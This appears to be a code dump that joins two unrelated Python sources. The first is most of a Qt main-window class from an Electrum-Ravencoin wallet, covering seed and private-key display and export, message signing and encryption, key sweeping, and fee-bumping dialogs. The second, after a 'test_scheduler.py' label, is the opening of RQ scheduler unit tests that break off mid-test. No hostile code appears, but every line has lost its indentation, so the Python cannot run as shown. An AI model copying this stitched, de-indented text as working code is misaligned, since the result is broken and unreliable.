run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s" % self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title=_("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = ravencoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not ravencoin.is_address(address):
self.show_message(_('Invalid Ravencoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not ravencoin.is_address(address):
self.show_message(_('Invalid Ravencoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2, 3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3, 1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2, 3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3, 1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
def cb(success: bool, error: str, data):
if not success:
if error:
self.show_error(error)
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
scan_qrcode(parent=self.top_level_window(), config=self.config, callback=cb)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t" + x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(
lambda: e.setText("Please wait... %d/%d" % (len(private_keys), len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s" % addr, pk])
else:
f.write(json.dumps(pklist, indent=4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("RVN currently in your wallet will be used for the fee to sweep assets\n"
"if there is no RVN held in the private keys.\n"
"Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
self.use_own_cb = QCheckBox(_('Force use own RVN'))
def on_cb(x):
self.force_use_own = x == Qt.Checked
self.use_own_cb.stateChanged.connect(on_cb)
vbox.addLayout(Buttons(self.use_own_cb, CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if ravencoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet(
(ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
total_held = sum([coin.value_sats() for coin in coins], RavenValue())
coins_rvn = [coin for coin in coins if coin.value_sats().rvn_value.value != 0]
coins_assets = [coin for coin in coins if coin.value_sats().assets]
self.warn_if_watching_only()
# If there is not RVN in the privkeys, use our own
# TODO: dynamically use our own RVN if not enough
# TODO: Ensure that any RVN held in the privkey is moved over
use_own = total_held.rvn_value.value < 0.1 or self.force_use_own
if use_own:
coins_rvn += list(self.get_coins())
outputs = []
if total_held.assets:
outputs = [PartialTxOutput.from_address_and_value(addr, value=value, asset=asset) for asset, value in total_held.assets.items()]
if total_held.rvn_value.value != 0:
outputs += [PartialTxOutput.from_address_and_value(addr, value=total_held.rvn_value, is_max=not use_own)]
self.pay_onchain_dialog(coins_rvn + coins_assets, outputs, external_keypairs=keypairs, mixed=use_own)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
self.asset_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses") + ':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys") + ':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.save_blacklist:
self.config.set_key('asset_blacklist', self.asset_blacklist, True)
if d.save_whitelist:
self.config.set_key('asset_whitelist', self.asset_whitelist, True)
if d.save_whitelist or d.save_blacklist:
self.asset_list.update()
self.history_model.refresh('Changed asset white or black list', True)
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
vis = self.config.get('enable_op_return_messages', False)
self.pubkey_label.setVisible(vis)
self.pubkey_e.setVisible(vis)
def closeEvent(self, event):
# note that closeEvent is NOT called if the user quits with Ctrl-C
self.clean_up()
event.accept()
def clean_up(self):
if self._cleaned_up:
return
self._cleaned_up = True
if self.wallet.thread:
self.wallet.thread.stop()
self.wallet.thread = None
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(), g.top(),
g.width(), g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
if self._update_check_thread:
self._update_check_thread.exit()
self._update_check_thread.wait()
if self.tray:
self.tray = None
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
# TODO: On mac, this cannot be closed; disabled for now
def logview_dialog(self):
from electrum.logging import get_logfile_path, electrum_logger
def watch_file(fn, logviewer):
# poor man's tail
if os.path.exists(fn):
mtime = os.path.getmtime(fn)
if mtime > self.logfile_mtime:
# file modified
self.logfile_mtime = mtime
logviewer.clear()
with open(fn, "r") as f:
for line in f:
logviewer.append(line.partition('Z |')[2].lstrip(' ').rstrip('\n'))
d = WindowModalDialog(self, _('Log Viewer'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
self.logviewer = QTextEdit()
self.logviewer.setAcceptRichText(False)
self.logviewer.setReadOnly(True)
self.logviewer.setPlainText(
_("Enable 'Write logs to file' in Preferences -> General and restart Electrum-Ravencoin to view logs here"))
layout.addWidget(self.logviewer, 1, 1)
logfile = get_logfile_path()
self.logtimer = QTimer(self)
if logfile is not None:
load_logfile = partial(watch_file, logfile, self.logviewer)
self.logfile_mtime = 0
load_logfile()
self.logtimer.timeout.connect(load_logfile)
self.logtimer.start(2500)
d.exec_()
self.logtimer.stop()
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400, 250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0, 1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes' % total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = RVNAmountEdit(self.get_decimal_point)
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb: Optional[int]) -> Optional[int]:
if fee_per_kb is None:
return None
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = round(fee)
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = BumpFeeDialog(main_window=self, tx=tx, txid=txid)
d.run()
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = DSCancelDialog(main_window=self, tx=tx, txid=txid)
d.run()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_(
"The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
test_scheduler.py
|
import os
import time
from datetime import datetime, timedelta
from multiprocessing import Process
from rq import Queue
from rq.compat import utc, PY2
from rq.exceptions import NoSuchJobError
from rq.job import Job
from rq.registry import FinishedJobRegistry, ScheduledJobRegistry
from rq.scheduler import RQScheduler
from rq.utils import current_timestamp
from rq.worker import Worker
from .fixtures import kill_worker, say_hello
from tests import RQTestCase
import mock
class TestScheduledJobRegistry(RQTestCase):
def test_get_jobs_to_enqueue(self):
"""Getting job ids to enqueue from ScheduledJobRegistry."""
queue = Queue(connection=self.testconn)
registry = ScheduledJobRegistry(queue=queue)
timestamp = current_timestamp()
self.testconn.zadd(registry.key, {'foo': 1})
self.testconn.zadd(registry.key, {'bar': timestamp + 10})
self.testconn.zadd(registry.key, {'baz': timestamp + 30})
self.assertEqual(registry.get_jobs_to_enqueue(), ['foo'])
self.assertEqual(registry.get_jobs_to_enqueue(timestamp + 20),
['foo', 'bar'])
def test_get_scheduled_time(self):
"""get_scheduled_time() returns job's scheduled datetime"""
queue = Queue(connection=self.testconn)
registry = ScheduledJobRegistry(queue=queue)
job = Job.create('myfunc', connection=self.testconn)
job.save()
dt = datetime(2019, 1, 1, tzinfo=utc)
registry.schedule(job, datetime(2019, 1, 1, tzinfo=utc))
self.assertEqual(registry.get_scheduled_time(job), dt)
# get_scheduled_time() should also work with job ID
self.assertEqual(registry.get_scheduled_time(job.id), dt)
# registry.get_scheduled_time() raises NoSuchJobError if
# job.id is not found
self.assertRaises(NoSuchJobError, registry.get_scheduled_time, '123')
def test_schedule(self):
"""Adding job with the correct score to ScheduledJobRegistry"""
queue = Queue(connection=self.testconn)
job = Job.create('myfunc', connection=self.testconn)
job.save()
registry = ScheduledJobRegistry(queue=queue)
if PY2:
# On Python 2, datetime needs to have timezone
self.assertRaises(ValueError, registry.schedule, job, datetime(2019, 1, 1))
registry.schedule(job, datetime(2019, 1, 1, tzinfo=utc))
self.assertEqual(self.testconn.zscore(registry.key, job.id),
1546300800) # 2019-01-01 UTC in Unix timestamp
else:
from datetime import timezone
# If we pass in a datetime with no timezone, `schedule()`
# assumes local timezone so depending on your local timezone,
# the timestamp maybe different
registry.schedule(job, datetime(2019, 1, 1))
self.assertEqual(self.testconn.zscore(registry.key, job.id),
1546300800 + time.timezone) # 2019-01-01 UTC in Unix timestamp
# Score is always stored in UTC even if datetime is in a different tz
tz = timezone(timedelta(hours=7))
job = Job.create('myfunc', connection=self.testconn)
job.save()
